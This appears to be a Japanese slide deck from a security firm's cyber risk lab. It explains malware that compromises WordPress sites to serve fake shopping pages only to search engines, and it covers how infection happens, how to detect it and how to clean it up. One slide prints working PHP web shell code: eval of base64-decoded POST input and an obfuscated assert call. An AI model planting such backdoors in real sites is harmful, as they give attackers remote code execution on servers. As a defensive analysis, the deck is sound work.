Más contenido relacionado
Similar a CMSに感染するマルウェア (15)
CMSに感染するマルウェア
- 1. Copyright © 2017 NaviPlus Co., Ltd. All rights reserved. 1
CMSに感染するマルウェア
ナビプラス株式会社
サイバーリスク研究所
片山 昌樹
- 2. Copyright © 2017 NaviPlus Co., Ltd. All rights reserved. 2
プロフィール
片山 昌樹(トトロ)
・生息地:澄んだ森(フォレンジクルーム:24時間冷房)
・移動:猫バス(青いアクア)
・趣味:人を驚かすこと(メンバーもビックリ)
・お友達:真っ黒クロスケ(マルウェア)
- 3. Copyright © 2017 NaviPlus Co., Ltd. All rights reserved. 3
何が起きてるの?
• 昨年中旬から、多くのサイトで改ざんを確認
• 「ポイント10倍」をキーワードに、楽〇もどきや、
Yah〇〇もどきがみつかる
- 5. Copyright © 2017 NaviPlus Co., Ltd. All rights reserved. 5
どうしてこうなったの?
・検索エンジンの検索BOTおよび検索エンジンに
よる検索結果経由でのみ表示するWEBページを
改ざんするマルウェアが存在
・通常のURLアクセス時は、『404 not found』 や
『白いページ』が表示されるため、気づかれにくい
- 6. Copyright © 2017 NaviPlus Co., Ltd. All rights reserved. 6
マルウェア挿入方法
• wordpressやpluginの脆弱性を利用して、
複数のマルウェアがwordpressのpluginとして挿入
– /wordpress/wp-admin/load-
styles.php?c=1&dir=ltr&load=dashicons,admin-bar,wp-
admin,buttons&ver=4.2.2
– /wordpress/wp-admin/update.php?action=upload-plugin
– /wordpress/wp-admin/load-
scripts.php?c=1&load%5B%5D=hoverIntent,common,admi
n-bar,svg-painter&ver=4.2.2
- 7. Copyright © 2017 NaviPlus Co., Ltd. All rights reserved. 7
どうやって見つける?
• Google、yahoo等で、下記キーワードで検索する
「ポイント10倍 site:検索するドメイン名」
• サイトにログインし、a.php b.php c.php 等を検索する
- 8. Copyright © 2017 NaviPlus Co., Ltd. All rights reserved. 8
マルウェアの一部
<?php
$mujj = $_POST['x']; if ($mujj!="") {
$xsser=base64_decode($_POST['z0']); @eval("$safedg = $xsser;"); }
?>
<?php
$c=base64_decode('YXNzZXI=').$_GET['n'].'t';@$c($_POST['x']);
?>abcabcabc
<?php eval ($_POST[1]); ?>
- 9. Copyright © 2017 NaviPlus Co., Ltd. All rights reserved. 9
駆除方法
• スクラップ・アンド・ビルドを強く推奨
• Wordpress本体および使用しているpluginを最新版に
更新
• 感染しているマルウェアの除去
• 改ざんされているコンテンツを、正しいコンテンツへ差
し替え
• 検索エンジンのサービス会社に対して、検索結果の
削除およびキャッシュデータの削除を依頼
- 10. Copyright © 2017 NaviPlus Co., Ltd. All rights reserved. 10
お問い合わせ先
ナビプラス株式会社
サイバーリスク研究所
navicert@naviplsu.co.jp